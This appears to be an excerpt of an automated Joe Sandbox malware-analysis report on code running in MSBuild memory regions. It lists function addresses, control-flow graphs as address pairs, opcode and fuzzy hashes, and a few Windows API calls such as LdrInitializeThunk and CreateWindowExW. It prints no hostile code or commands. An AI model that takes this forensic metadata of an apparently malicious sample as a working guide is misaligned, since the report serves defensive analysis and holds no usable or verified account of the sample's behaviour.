                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 6470f5dfaf9b1235a280d73cb1a411b79857878c226d716ffc42118a9910e813
                                                                                                                              • Instruction ID: 2dfd37c0176588642ae50dcd4a001aba1f112665e084cb66900dede80121b923
                                                                                                                              • Opcode Fuzzy Hash: 6470f5dfaf9b1235a280d73cb1a411b79857878c226d716ffc42118a9910e813
                                                                                                                              • Instruction Fuzzy Hash: 9991C074E402588FDB15CFAAD884ADEBBF2BF88301F54D0A9E449AB365DB349941CF10
                                                                                                                              Function 02EBC468 Relevance: 3.9, Strings: 3, Instructions: 191COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 654 2ebc468-2ebc46d 655 2ebc46f-2ebc498 654->655 656 2ebc4c6-2ebc57c call 2eb41a0 call 2eb3cc0 654->656 657 2ebc49a 655->657 658 2ebc49f-2ebc4c4 655->658 668 2ebc57e 656->668 669 2ebc583-2ebc5a4 call 2eb5658 656->669 657->658 658->656 668->669 671 2ebc5a9-2ebc5b4 669->671 672 2ebc5bb-2ebc5bf 671->672 673 2ebc5b6 671->673 674 2ebc5c1-2ebc5c2 672->674 675 2ebc5c4-2ebc5cb 672->675 673->672 678 2ebc5e3-2ebc627 674->678 676 2ebc5cd 675->676 677 2ebc5d2-2ebc5e0 675->677 676->677 677->678 682 2ebc68d-2ebc6a4 678->682 684 2ebc629-2ebc63f 682->684 685 2ebc6a6-2ebc6cb 682->685 689 2ebc669 684->689 690 2ebc641-2ebc64d 684->690 692 2ebc6cd-2ebc6e2 685->692 693 2ebc6e3 685->693 691 2ebc66f-2ebc68c 689->691 694 2ebc64f-2ebc655 690->694 695 2ebc657-2ebc65d 690->695 691->682 692->693 696 2ebc667 694->696 695->696 696->691
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 4bf8f375a877da56c7c1326c5ed57d41783a6c8238d62531c01e5307ec6ede5b
                                                                                                                              • Instruction ID: 7dc23ec93f2d7fcac0a7ebb4e80f72d8049b0e9ebef1a93f73d68c3754682cbb
                                                                                                                              • Opcode Fuzzy Hash: 4bf8f375a877da56c7c1326c5ed57d41783a6c8238d62531c01e5307ec6ede5b
                                                                                                                              • Instruction Fuzzy Hash: 1991D474E442588FDB15CFAAD884ADEBBF2BF88304F24E06AD419AB355DB349941CF50
                                                                                                                              Function 02EBCA08 Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 700 2ebca08-2ebca16 702 2ebca1a-2ebca38 700->702 703 2ebca18-2ebca19 700->703 704 2ebca3a 702->704 705 2ebca3f-2ebcb1c call 2eb41a0 call 2eb3cc0 702->705 703->702 704->705 715 2ebcb1e 705->715 716 2ebcb23-2ebcb44 call 2eb5658 705->716 715->716 718 2ebcb49-2ebcb54 716->718 719 2ebcb5b-2ebcb5f 718->719 720 2ebcb56 718->720 721 2ebcb61-2ebcb62 719->721 722 2ebcb64-2ebcb6b 719->722 720->719 723 2ebcb83-2ebcbc7 721->723 724 2ebcb6d 722->724 725 2ebcb72-2ebcb80 722->725 729 2ebcc2d-2ebcc44 723->729 724->725 725->723 731 2ebcbc9-2ebcbdf 729->731 732 2ebcc46-2ebcc6b 729->732 736 2ebcc09 731->736 737 2ebcbe1-2ebcbed 731->737 738 2ebcc6d-2ebcc82 732->738 739 2ebcc83 732->739 742 2ebcc0f-2ebcc2c 736->742 740 2ebcbef-2ebcbf5 737->740 741 2ebcbf7-2ebcbfd 737->741 738->739 743 2ebcc07 740->743 741->743 742->729 743->742
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 3136140c6fdff1c56b81428f40cd4cabb2eab1e39e395e4ecd029db679552260
                                                                                                                              • Instruction ID: 5e0f97ec9d4bb04f0019e2e012b7a396c026cbf46eb56caaa2a0c07c2e1bc3ad
                                                                                                                              • Opcode Fuzzy Hash: 3136140c6fdff1c56b81428f40cd4cabb2eab1e39e395e4ecd029db679552260
                                                                                                                              • Instruction Fuzzy Hash: E481A074E402188FDB14DFAAD894A9EBBF2BF88300F24D06AD419AB265DB349941CF50
                                                                                                                              Function 02EBD278 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 839 2ebd278-2ebd286 840 2ebd28a-2ebd2a8 839->840 841 2ebd288-2ebd289 839->841 842 2ebd2aa 840->842 843 2ebd2af-2ebd38c call 2eb41a0 call 2eb3cc0 840->843 841->840 842->843 853 2ebd38e 843->853 854 2ebd393-2ebd3b4 call 2eb5658 843->854 853->854 856 2ebd3b9-2ebd3c4 854->856 857 2ebd3cb-2ebd3cf 856->857 858 2ebd3c6 856->858 859 2ebd3d1-2ebd3d2 857->859 860 2ebd3d4-2ebd3db 857->860 858->857 861 2ebd3f3-2ebd437 859->861 862 2ebd3dd 860->862 863 2ebd3e2-2ebd3f0 860->863 867 2ebd49d-2ebd4b4 861->867 862->863 863->861 869 2ebd439-2ebd44f 867->869 870 2ebd4b6-2ebd4db 867->870 874 2ebd479 869->874 875 2ebd451-2ebd45d 869->875 877 2ebd4dd-2ebd4f2 870->877 878 2ebd4f3 870->878 876 2ebd47f-2ebd49c 874->876 879 2ebd45f-2ebd465 875->879 880 2ebd467-2ebd46d 875->880 876->867 877->878 881 2ebd477 879->881 880->881 881->876
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 804b703d95c662ed4ac916a218402939883a2c2838998556427cc792afd15991
                                                                                                                              • Instruction ID: ce2a3f67d81267d30c5642c0c1282ebad90f74070510a0f47366f035096c6f9d
                                                                                                                              • Opcode Fuzzy Hash: 804b703d95c662ed4ac916a218402939883a2c2838998556427cc792afd15991
                                                                                                                              • Instruction Fuzzy Hash: 78819274E40218CFDB14DFAAD984A9EBBF2BF88310F14D069E409AB365DB349941CF50
                                                                                                                              Function 02EBC738 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 747 2ebc738-2ebc746 748 2ebc74a-2ebc768 747->748 749 2ebc748-2ebc749 747->749 750 2ebc76a 748->750 751 2ebc76f-2ebc84c call 2eb41a0 call 2eb3cc0 748->751 749->748 750->751 761 2ebc84e 751->761 762 2ebc853-2ebc874 call 2eb5658 751->762 761->762 764 2ebc879-2ebc884 762->764 765 2ebc88b-2ebc88f 764->765 766 2ebc886 764->766 767 2ebc891-2ebc892 765->767 768 2ebc894-2ebc89b 765->768 766->765 769 2ebc8b3-2ebc8f7 767->769 770 2ebc89d 768->770 771 2ebc8a2-2ebc8b0 768->771 775 2ebc95d-2ebc974 769->775 770->771 771->769 777 2ebc8f9-2ebc90f 775->777 778 2ebc976-2ebc99b 775->778 781 2ebc939 777->781 782 2ebc911-2ebc91d 777->782 784 2ebc99d-2ebc9b2 778->784 785 2ebc9b3 778->785 788 2ebc93f-2ebc95c 781->788 786 2ebc91f-2ebc925 782->786 787 2ebc927-2ebc92d 782->787 784->785 789 2ebc937 786->789 787->789 788->775 789->788
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 3907f3d20bc7024d1d7e0a09b3d191881616fcc27ce157984f0f48c36b1e3f7d
                                                                                                                              • Instruction ID: 6ea5e3cba4860ce72cecc90d403098b8d6b527550d1bc960e1bd29540265aafa
                                                                                                                              • Opcode Fuzzy Hash: 3907f3d20bc7024d1d7e0a09b3d191881616fcc27ce157984f0f48c36b1e3f7d
                                                                                                                              • Instruction Fuzzy Hash: 7A81B274E40218CFEB15DFAAD944A9EBBF2BF88304F24D06AD419AB355DB349941CF50
                                                                                                                              Function 02EBCCD8 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 793 2ebccd8-2ebcce6 794 2ebccea-2ebcd08 793->794 795 2ebcce8-2ebcce9 793->795 796 2ebcd0a 794->796 797 2ebcd0f-2ebcdec call 2eb41a0 call 2eb3cc0 794->797 795->794 796->797 807 2ebcdee 797->807 808 2ebcdf3-2ebce14 call 2eb5658 797->808 807->808 810 2ebce19-2ebce24 808->810 811 2ebce2b-2ebce2f 810->811 812 2ebce26 810->812 813 2ebce31-2ebce32 811->813 814 2ebce34-2ebce3b 811->814 812->811 815 2ebce53-2ebce97 813->815 816 2ebce3d 814->816 817 2ebce42-2ebce50 814->817 821 2ebcefd-2ebcf14 815->821 816->817 817->815 823 2ebce99-2ebceaf 821->823 824 2ebcf16-2ebcf3b 821->824 828 2ebced9 823->828 829 2ebceb1-2ebcebd 823->829 830 2ebcf3d-2ebcf52 824->830 831 2ebcf53 824->831 834 2ebcedf-2ebcefc 828->834 832 2ebcebf-2ebcec5 829->832 833 2ebcec7-2ebcecd 829->833 830->831 835 2ebced7 832->835 833->835 834->821 835->834
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 70a28db24209f3354074e2a8347516f4a43401198edd9f45d0572da7f650c0ec
                                                                                                                              • Instruction ID: b11d82d0407af13989ae036be7428365b350ac7fec1d1e83e54f42ca252e7d6c
                                                                                                                              • Opcode Fuzzy Hash: 70a28db24209f3354074e2a8347516f4a43401198edd9f45d0572da7f650c0ec
                                                                                                                              • Instruction Fuzzy Hash: 9F81B474E40218DFDB14DFAAD844AAEBBF2BF88304F24D06AD419AB355DB349941CF50
                                                                                                                              Function 02EBCFAA Relevance: 3.9, Strings: 3, Instructions: 185COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 885 2ebcfaa-2ebcfb6 886 2ebcfba-2ebcfd8 885->886 887 2ebcfb8-2ebcfb9 885->887 888 2ebcfda 886->888 889 2ebcfdf-2ebd0bc call 2eb41a0 call 2eb3cc0 886->889 887->886 888->889 899 2ebd0be 889->899 900 2ebd0c3-2ebd0e4 call 2eb5658 889->900 899->900 902 2ebd0e9-2ebd0f4 900->902 903 2ebd0fb-2ebd0ff 902->903 904 2ebd0f6 902->904 905 2ebd101-2ebd102 903->905 906 2ebd104-2ebd10b 903->906 904->903 907 2ebd123-2ebd167 905->907 908 2ebd10d 906->908 909 2ebd112-2ebd120 906->909 913 2ebd1cd-2ebd1e4 907->913 908->909 909->907 915 2ebd169-2ebd17f 913->915 916 2ebd1e6-2ebd20b 913->916 920 2ebd1a9 915->920 921 2ebd181-2ebd18d 915->921 923 2ebd20d-2ebd222 916->923 924 2ebd223 916->924 922 2ebd1af-2ebd1cc 920->922 925 2ebd18f-2ebd195 921->925 926 2ebd197-2ebd19d 921->926 922->913 923->924 927 2ebd1a7 925->927 926->927 927->922
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: 0op$Ljp$Ljp
                                                                                                                              • API String ID: 0-600165640
                                                                                                                              • Opcode ID: 33b972d75c8b43640231c5216eaaee849d5a2e12c0af15337f1df1d821a7439f
                                                                                                                              • Instruction ID: 7882d9aac69ab5aead1536d8ede5020c5c7b3eab57f4415eb03231deae379056
                                                                                                                              • Opcode Fuzzy Hash: 33b972d75c8b43640231c5216eaaee849d5a2e12c0af15337f1df1d821a7439f
                                                                                                                              • Instruction Fuzzy Hash: 6D819074E40258CFDB15DFAAD884A9EBBF2BF88304F14D069E419AB365DB349981CF50
                                                                                                                              Function 06AB9548 Relevance: 1.9, APIs: 1, Instructions: 357COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1367 6ab9548-6ab9577 1368 6ab9579 1367->1368 1369 6ab957e-6ab9614 1367->1369 1368->1369 1371 6ab96b3-6ab96b9 1369->1371 1372 6ab9619-6ab962c 1371->1372 1373 6ab96bf-6ab96d7 1371->1373 1374 6ab962e 1372->1374 1375 6ab9633-6ab9684 1372->1375 1376 6ab96eb-6ab96fe 1373->1376 1377 6ab96d9-6ab96e6 1373->1377 1374->1375 1393 6ab9697-6ab96a9 1375->1393 1394 6ab9686-6ab9694 1375->1394 1379 6ab9700 1376->1379 1380 6ab9705-6ab9721 1376->1380 1378 6ab9a81-6ab9b7e 1377->1378 1385 6ab9b80-6ab9b85 1378->1385 1386 6ab9b86-6ab9b90 1378->1386 1379->1380 1382 6ab9728-6ab974c 1380->1382 1383 6ab9723 1380->1383 1389 6ab974e 1382->1389 1390 6ab9753-6ab9785 1382->1390 1383->1382 1385->1386 1389->1390 1399 6ab978c-6ab97ce 1390->1399 1400 6ab9787 1390->1400 1396 6ab96ab 1393->1396 1397 6ab96b0 1393->1397 1394->1373 1396->1397 1397->1371 1402 6ab97d0 1399->1402 1403 6ab97d5-6ab97de 1399->1403 1400->1399 1402->1403 1404 6ab9a06-6ab9a0c 1403->1404 1405 6ab97e3-6ab9808 1404->1405 1406 6ab9a12-6ab9a25 1404->1406 1407 6ab980a 1405->1407 1408 6ab980f-6ab9846 1405->1408 1409 6ab9a2c-6ab9a47 1406->1409 1410 6ab9a27 1406->1410 1407->1408 1418 6ab9848 1408->1418 1419 6ab984d-6ab987f 1408->1419 1411 6ab9a49 1409->1411 1412 6ab9a4e-6ab9a62 1409->1412 1410->1409 1411->1412 1416 6ab9a69-6ab9a7f LdrInitializeThunk 1412->1416 1417 6ab9a64 1412->1417 1416->1378 1417->1416 1418->1419 1421 6ab98e3-6ab98f6 1419->1421 1422 6ab9881-6ab98a6 1419->1422 1425 6ab98f8 1421->1425 1426 6ab98fd-6ab9922 1421->1426 1423 6ab98a8 1422->1423 1424 6ab98ad-6ab98db 1422->1424 1423->1424 1424->1421 1425->1426 1429 6ab9931-6ab9969 1426->1429 1430 6ab9924-6ab9925 1426->1430 1431 6ab996b 1429->1431 1432 6ab9970-6ab99d1 call 6ab9328 1429->1432 1430->1406 1431->1432 1438 6ab99d8-6ab99fc 1432->1438 1439 6ab99d3 1432->1439 1442 6ab99fe 1438->1442 1443 6ab9a03 1438->1443 1439->1438 1442->1443 1443->1404
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3589729156.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_6ab0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5c460cd516db442e579c756c9db20a93b3cf9e0ae0bc7310e7391eb48542268a
                                                                                                                              • Instruction ID: cea08b125491a8c6774c5f0a135de8a7af7be31932a10ec58a2d5f3699f76d29
                                                                                                                              • Opcode Fuzzy Hash: 5c460cd516db442e579c756c9db20a93b3cf9e0ae0bc7310e7391eb48542268a
                                                                                                                              • Instruction Fuzzy Hash: EBF1E474D00218DFDB54DFA9C884B9EBBB6BF89300F1091A9D508AB356DB749986CF50
                                                                                                                              Function 02EBA088 Relevance: .9, Instructions: 894COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1ee0ab2b19ab6cb7be3c08544a6d4ffbc604cf8d17aae591333da7775bf7294
                                                                                                                              • Instruction ID: dbbceb458230bc6fb73618b21d7680ce4788b109eebe8d90334ba5a93a163d6b
                                                                                                                              • Opcode Fuzzy Hash: f1ee0ab2b19ab6cb7be3c08544a6d4ffbc604cf8d17aae591333da7775bf7294
                                                                                                                              • Instruction Fuzzy Hash: 22825C71A40209DFCF16CFA8C584AEEBBB2BF89304F15D569E9059B365D730E981CB60
                                                                                                                              Function 02EB69A0 Relevance: .5, Instructions: 514COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d2ca668dd08b81908c6d6a0fe6ef069e665de446f650fd521f419a37eee3212d
                                                                                                                              • Instruction ID: fb09edfc1211a55dadebfc914789a97ad70e075b4a5ea8f3bce07910b79ccbf7
                                                                                                                              • Opcode Fuzzy Hash: d2ca668dd08b81908c6d6a0fe6ef069e665de446f650fd521f419a37eee3212d
                                                                                                                              • Instruction Fuzzy Hash: 21126B70A402199FDB15DF69C854BAEBBFABF88304F14C569E805EB390DB309D81CB90
                                                                                                                              Function 02EB7118 Relevance: .4, Instructions: 356COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b9325d2d959d49a3bfe266258a7a2a3f50a6048f9baff18537f918dc5db6bada
                                                                                                                              • Instruction ID: 1a0ba50fba123be9f06987c74a8219c9b49f864d6743b1a7aed3086b2694bd93
                                                                                                                              • Opcode Fuzzy Hash: b9325d2d959d49a3bfe266258a7a2a3f50a6048f9baff18537f918dc5db6bada
                                                                                                                              • Instruction Fuzzy Hash: A8E14D72A81109CFCB16CFA9D984AEEFBB2BF88309F55D065E805E7665D730E841CB50
                                                                                                                              Function 02EBE97A Relevance: .1, Instructions: 148COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8bb84f1ee9573eecd14b36dc538c1d763429b6b3d19d8f1b3e05b2a02b253c57
                                                                                                                              • Instruction ID: 685f02aee38e78d2a199c8489bf5a7036ee0a6c38c0f8df7817cebbdcde502c6
                                                                                                                              • Opcode Fuzzy Hash: 8bb84f1ee9573eecd14b36dc538c1d763429b6b3d19d8f1b3e05b2a02b253c57
                                                                                                                              • Instruction Fuzzy Hash: 5451B474E00208DFDB19DFAAD894ADEBBB6BF89300F14D029E815AB365DB345841CF54
                                                                                                                              Function 02EBE988 Relevance: .1, Instructions: 147COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3577133556.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_2eb0000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f1f7e694ffe233579a712f54c1b08dcafdf5f659f5a4b06b12dbc177770298e1
                                                                                                                              • Instruction ID: 2a9f3399cd30163195c550f41442ad430585687aeebe6d744d8f3b607a9ee11c
                                                                                                                              • Opcode Fuzzy Hash: f1f7e694ffe233579a712f54c1b08dcafdf5f659f5a4b06b12dbc177770298e1
                                                                                                                              • Instruction Fuzzy Hash: B351A574E00209DFDB19DFAAD894ADEBBB6BF89300F24D029E815AB365DB345841CF54
                                                                                                                              Function 01195750 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1444 1195750-119575f 1445 119578b-119578f 1444->1445 1446 1195761-119576e call 1194c14 1444->1446 1448 1195791-119579b 1445->1448 1449 11957a3-11957e4 1445->1449 1451 1195770 1446->1451 1452 1195784 1446->1452 1448->1449 1455 11957f1-11957ff 1449->1455 1456 11957e6-11957ee 1449->1456 1499 1195776 call 11959d8 1451->1499 1500 1195776 call 11959e8 1451->1500 1452->1445 1457 1195801-1195806 1455->1457 1458 1195823-1195825 1455->1458 1456->1455 1460 1195808-119580f call 1194c20 1457->1460 1461 1195811 1457->1461 1463 1195828-119582f 1458->1463 1459 119577c-119577e 1459->1452 1462 11958c0-1195980 1459->1462 1465 1195813-1195821 1460->1465 1461->1465 1494 1195988-11959b3 GetModuleHandleW 1462->1494 1495 1195982-1195985 1462->1495 1466 119583c-1195843 1463->1466 1467 1195831-1195839 1463->1467 1465->1463 1469 1195850-1195859 1466->1469 1470 1195845-119584d 1466->1470 1467->1466 1474 119585b-1195863 1469->1474 1475 1195866-119586b 1469->1475 1470->1469 1474->1475 1476 1195889-119588d 1475->1476 1477 119586d-1195874 1475->1477 1501 1195890 call 1195c99 1476->1501 1502 1195890 call 1195ca8 1476->1502 1477->1476 1479 1195876-1195886 call 1192ce4 call 1194c30 1477->1479 1479->1476 1482 1195893-1195896 1484 11958b9-11958bf 1482->1484 1485 1195898-11958b6 1482->1485 1485->1484 1496 11959bc-11959d0 1494->1496 1497 11959b5-11959bb 1494->1497 1495->1494 1497->1496 1499->1459 1500->1459 1501->1482 1502->1482
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 477b782b25dc0f3183ec645050c32c0c2fba5340027a5f84afdcb1137b6ca7b6
                                                                                                                              • Instruction ID: 5840ffe2068032ca05da00579bdb5c71b89905f497a343eb54204519a365b566
                                                                                                                              • Opcode Fuzzy Hash: 477b782b25dc0f3183ec645050c32c0c2fba5340027a5f84afdcb1137b6ca7b6
                                                                                                                              • Instruction Fuzzy Hash: D8814970A00B458FEB69DF2AD44075ABBF2FF88304F10892ED59ADBA40D774E945CB91
                                                                                                                              Function 01197924 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1503 1197924-119792c 1504 119795e-1197996 1503->1504 1505 119792e-1197957 1503->1505 1507 1197998-119799e 1504->1507 1508 11979a1-11979a8 1504->1508 1505->1504 1507->1508 1509 11979aa-11979b0 1508->1509 1510 11979b3-11979eb 1508->1510 1509->1510 1511 11979f3-1197a52 CreateWindowExW 1510->1511 1512 1197a5b-1197a93 1511->1512 1513 1197a54-1197a5a 1511->1513 1517 1197aa0 1512->1517 1518 1197a95-1197a98 1512->1518 1513->1512 1519 1197aa1 1517->1519 1518->1517 1519->1519
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: 22e554291d67fb9ae39527ab2b52087667190088b8e6eab308b29769a4ab676c
                                                                                                                              • Instruction ID: f0fd8b19bba0081339b2b2d2c6e79e67a684472072c6392a62e57201f728626e
                                                                                                                              • Opcode Fuzzy Hash: 22e554291d67fb9ae39527ab2b52087667190088b8e6eab308b29769a4ab676c
                                                                                                                              • Instruction Fuzzy Hash: 1F51B1B1D102499FDF18CF9AC980ADEBBB5FF48310F24812AE818AB250D7759945CF90
                                                                                                                              Function 01194DCC Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                              Download Yara Rule

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 1520 1194dcc-1197996 1523 1197998-119799e 1520->1523 1524 11979a1-11979a8 1520->1524 1523->1524 1525 11979aa-11979b0 1524->1525 1526 11979b3-1197a52 CreateWindowExW 1524->1526 1525->1526 1528 1197a5b-1197a93 1526->1528 1529 1197a54-1197a5a 1526->1529 1533 1197aa0 1528->1533 1534 1197a95-1197a98 1528->1534 1529->1528 1535 1197aa1 1533->1535 1534->1533 1535->1535
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 01197A42
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000011.00000002.3574547432.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_17_2_1190000_MSBuild.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0
                                                                                                                              • Opcode ID: bb66a42792a6d421d4eec6b5e57ebf372603306ee8ebdbfdeb9d9f2403749d7d
                                                                                                                              • Instruction ID: e66d12bed5672b74b7e0bf3bbf9f120aa5e5cab2fef7edc5643b30fff3780c4e
                                                                                                                              • Opcode Fuzzy Hash: bb66a42792a6d421d4eec6b5e57ebf372603306ee8ebdbfdeb9d9f2403749d7d
                                                                                                                              • Instruction Fuzzy Hash: F151C0B1D102099FDF18CF9AC884ADEBBB5FF48310F24812AE819AB250D7749981CF90
